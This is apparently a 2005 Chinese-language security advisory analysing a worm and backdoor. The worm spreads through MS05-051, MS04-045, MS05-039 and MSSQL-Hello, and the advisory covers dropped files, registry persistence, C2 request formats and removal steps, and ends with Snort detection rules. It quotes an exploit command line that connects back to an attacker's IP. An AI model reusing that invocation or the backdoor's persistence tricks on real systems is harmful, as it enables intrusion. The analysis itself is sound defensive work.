Author: killer (killer<2>xfocus.org)
Date:2005-12-20

近日，一种以利用MS05-051漏洞的新型的蠕虫爆发，该蠕虫在几天内迅速出现多个变种，新变种除了利用MS05-051外，还利用MS04-045、MS05-039、MSSQL-Hello等漏洞传播，威胁到Windows 2000、Windows XP、Windows 2003等系统。

病毒文件主要分为两部分，一部分为病毒的扫描、溢出部分，一部分是攻击者进行远程控制。

一、扫描：

蠕虫体在运行后会释放出来如下文件：

%System%\wins\Result.txt 结果文件
%System%\wins\SqlExp.exe Exploit.Win32.MS04-045.k
%System%\wins\SqlExp1.exe Exploit.Win32.MS05-039.ac
%System%\wins\SqlExp2.exe Exploit.Win32.MS05-051.d
%System%\wins\SqlExp3.exe Exploit.Win32.MSSQL-Hello.a
%System%\wins\SqlScan.exe NetTool.Win32.TCPPortScanner
%System%\wins\Sqltob.exe Net-Worm.Win32.Dasher.b

同目录下还可能存在42.txt、445.txt、1025.txt、1433.txt等遗留文件。

其中.b变种的sqltob.exe蠕虫体主文件：

[文件信息]
Size: 0x2420 (9248)
MD5:53BAE5B6B6CD8794B05DF2B99B4128BA
PE Appended: at 0x2264 (8804), size 0x1BC (444)
Compiler：LCC Win32

sqltob.exe协调扫描和攻击，攻击采用格式如下：SqlExp.exe -r 222.240.219.143 -p 53 -o 0 -t ip
其中222.240.219.143为“黑客”的控制IP。

1、蠕虫修改注册表，增加如下键：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters

键名：SMBDeviceEnabled
键值：dword:00000000

2、修改如下键：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDTC
键名：Start
修改为：dword:00000004

二、控制：

此组合蠕虫采用如下后门文件控制目标系统：

%ProgramFiles%\nzspfrwy.log keylog文件
%ProgramFiles%\nzspfrwy.dll Backdoor.Win32.PcClient.ij
%ProgramFiles%\nzspfrwy.dl1 Backdoor.Win32.PcClient.hp
%ProgramFiles%\nzspfrwy.sys Backdoor.Win32.PcClient.ij

其中nzspfrwy.sys驱动HOOK系统SSDT来隐藏nzspfrwy*文件。第一次运行将nzspfrwy.dll插入到svchost进程，并启动一个隐藏的IE进程与远程主机通信。连接域名free？？？-？？？.cn/zyangel和DNS？？.3322.org域名，前者域名可以下载sdbot相关文件，后者将接受控制者控制。(？为屏蔽的字母)

1、修改如下键：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
键名：ServiceDll
修改为：%ProgramFiles%\nzspfrwy.dll

2、增加如下服务：
服务名称：nzspfrwy
显示名称：nzspfrwy
执行文件路径：C:\Program Files\nzspfrwy.sys

3、采用如下方式与控制者通讯：
PUT /upjpg.asp?501361070000F0FD010026*
GET /index.asp?500261070000F0FD010026*

三、清除办法：(以WIN2000 PRO版为例)

1、任务管理器结束：Sqltob.exe、SqlScan.exe进程。
2、删除%System%\wins下对应文件。
3、修改注册表键停止内核驱动：

从如下地址下载IceSword运行：http://www.xfocus.net/tools/200506/1051.html

定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nzspfrwy
修改Startdword值为4，重启动系统。

4、重启动后，会在任务管理器中看到没有被隐藏的IE进程，该进程无法用任务管理器结束，可以用ntsd -cq -p pid 结束。
删除%ProgramFiles%\对应的病毒文件。

5、删除残余服务表项：
SC delete nzspfrwy
用注册表编辑器删除此键：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NZSPFRWY

6、恢复HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters表项：
键名：ServiceDll
病毒键值：%ProgramFiles%\nzspfrwy.dll
恢复为：%SystemRoot%\system32\rpcss.dll

7、升级系统补丁。

8、在防火墙中屏蔽如下端口：
42
445
1025
1433


四、Snort预警规则：

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433 (msg:"EXPLOIT MS-SQL Hello Overflow Attempt"; flow:to_server,established; content:"|12 01 00 34 00 00 00 00|"; offset:0; depth:8; dsize:>570; reference:url,www.microsoft.com/technet/security/bulletin/MS02-056.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"EXPLOIT UPnP Overflow Attempt"; flow:to_server,established; content:"|ff 53 4d 42 25|"; offset:4; depth:5; content:"|5c 00 50 00 49 00 50 00 45 00 5c 00 00 00|"; offset:72; depth:14; content:"|26 00|"; offset:65; depth:2; content:"|00|"; offset:90; depth:1; content:"|36 00|"; offset:110; depth:2; content:"|90 90 90 90 90 90 90 90 90 90 90 90|"; offset:200; dsize:>1300; reference:url,www.microsoft.com/technet/security/bulletin/MS05-039.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"EXPLOIT MSDTC Overflow Attempt"; flow:to_server,established; content:"|05 00 00 83 10 00 00 00 2c 05|"; offset:0; depth:10; content:"|e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da|"; offset:24; depth:16; content:"|cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00|"; offset:208; dsize:1024; reference:url,www.microsoft.com/technet/security/bulletin/MS05-051.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 42 (msg:"EXPLOIT WINS Overflow Attempt"; flow:to_server,established; byte_test:1,&,64,6; byte_test:1,&,32,6; byte_test:1,&,16,6; byte_test:1,&,8,6; pcre:!"/^.{8}(\x05\x37(\x1E[\x90-\xFF]|[\x1F-\x2F].|\x30[\x00-\x70])|\x00\x00\x00[\x00-\x65]|\x02\x68\x05\xC0)/s"; reference:bugtraq,11763; reference:cve,2004-1080; reference:url,www.immunitysec.com/downloads/instantanea.pdf; reference:url,www.microsoft.com/technet/security/bulletin/MS04-045.mspx; classtype:misc-attack; sid:3017; rev:6;)